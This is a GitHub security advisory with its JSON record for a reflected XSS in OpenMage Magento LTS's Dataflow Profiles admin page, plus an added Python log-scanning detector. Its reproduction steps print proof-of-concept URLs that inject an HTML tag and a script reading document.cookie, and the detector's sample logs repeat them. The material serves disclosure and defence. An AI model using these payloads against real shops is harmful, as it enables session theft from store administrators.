GHSA-X8JV-Q8J2-487C

Vulnerability from github – Published: 2026-05-06 20:57 – Updated: 2026-05-15 23:49
Summary
Magento LTS: Reflected XSS - Import -> Data Flow (profiles)
Details

A reflected XSS vulnerability was found in the admin panel under System -> Import/Export -> Dataflow - Profiles.

Steps to reproduce

  • Log in to the admin panel.

  • Go to System -> Import/Export -> Dataflow - Profiles.

  • Select Import as the profile direction.

  • Click Import Customers.

  • Upload the file.

File Link: customer_20260212_204335.csv

  • Go back to Run profile.

  • Select the uploaded file and click Run in Popup.

  • The popup opens at a URL like this:

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/

  • The filename from the URL is reflected inside HTML tags in the response.

  • Inject an HTML tag and observe.

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/"><h3>hacked</h3>/

  • The injected tag is rendered by the browser.

  • Proceed to XSS.

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E

  • There is an XSS popup.

Impact

Cookie theft, JavaScript-based defacement, and more.
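
A detection sketch for the request shape shown in the steps above, added here as an example and not part of the advisory or of OpenMage's code: it scans access-log lines for Dataflow run requests whose `files` path value is not a plain file name. The log format, the `SAFE_NAME` allow-list and all function names are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Route and `files` path parameter as they appear in the advisory's URLs.
ROUTE = "/admin/system_convert_gui/run/"
# Assumption: legitimate uploaded import file names use only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,255}")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')  # "GET <target> HTTP/1.1"


def files_value(target):
    """Return the decoded `files` value of a Dataflow run request, else None."""
    path = target.split("?", 1)[0]
    if ROUTE not in path:
        return None
    tail = "/" + path.split(ROUTE, 1)[1]
    if "/files/" not in tail:
        return None
    # Keep everything after /files/: reflected markup such as </h3> contains "/".
    value = tail.split("/files/", 1)[1].rstrip("/")
    for _ in range(3):  # bounded loop to undo nested percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for runs whose file name is not plain."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        value = files_value(match.group(1)) if match else None
        if value is not None and not SAFE_NAME.fullmatch(value):
            hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
BASE = "/index.php/admin/system_convert_gui/run/id/6/key/EXAMPLEKEY/files/"
FMT = '203.0.113.5 - - [15/Feb/2026:15:11:30 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [FMT.format(BASE + name) for name in (
    "import-20260215151125-1_customer_20260212_204335.csv/",
    "%22%3E%3Ch3%3Ehacked%3C/h3%3E/",
    "%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E",
    "%253Cb%253E/",
)] + [FMT.format("/index.php/admin/dashboard/")]
print(suspicious_requests(SAMPLE_LOG))
```

The legitimate import on line 1 and the unrelated admin request on line 5 are not reported; the three requests carrying markup in `files` are, including the doubly encoded one.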

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 20.17.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "openmage/magento-lts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42458"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T20:57:37Z",
    "nvd_published_at": "2026-05-15T17:16:46Z",
    "severity": "MODERATE"
  },
  "details": "A reflected XSS vulnerability was found under admin panel -\u003e  System -\u003e Import/Export -\u003e Dataflow -  Profiles.\n\n## Steps to produce\n\n+ Login to  the admin panel \n\n+ Go to the path   `System -\u003e Import/Export -\u003e Dataflow -  Profiles`\n\n+ Select profile direction as `Import`.\n\n+ Click on `Import Customers` \n\n+ Upload the file.\n\nFile Link: [customer_20260212_204335.csv](https://github.com/user-attachments/files/25629638/customer_20260212_204335.csv)\n\n+ Go back to `Run profile`.\n\n+ Select the uploaded file and Click on `Run in Popup`.\n\n+ One can see a URL like this \n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/\n```\n\n\n+ One can see the filename getting reflection in HTML tags.\n\n+ Inject an HTML tag and observe.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/\"\u003e\u003ch3\u003ehacked\u003c/h3\u003e/\n``` \n\n\u003cimg width=\"1796\" height=\"302\" alt=\"image (3)\" src=\"https://github.com/user-attachments/assets/502330b0-fa73-4b90-a81f-6216a98e474a\" /\u003e\n\n+ One can see the tag is getting executed.\n\n+  Proceed for XSS.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E\n```\n\n\u003cimg width=\"1670\" height=\"562\" alt=\"image (4)\" src=\"https://github.com/user-attachments/assets/98a75081-fa8c-4483-9078-0ab5e7e14e4d\" /\u003e\n\n\n+ There is an XSS popup.\n\n## Impact\n\nCookie stealing, JS deface, many more",
  "id": "GHSA-x8jv-q8j2-487c",
  "modified": "2026-05-15T23:49:07Z",
  "published": "2026-05-06T20:57:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenMage/magento-lts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Magento LTS: Reflected XSS - Import -\u003e Data Flow (profiles) "
}

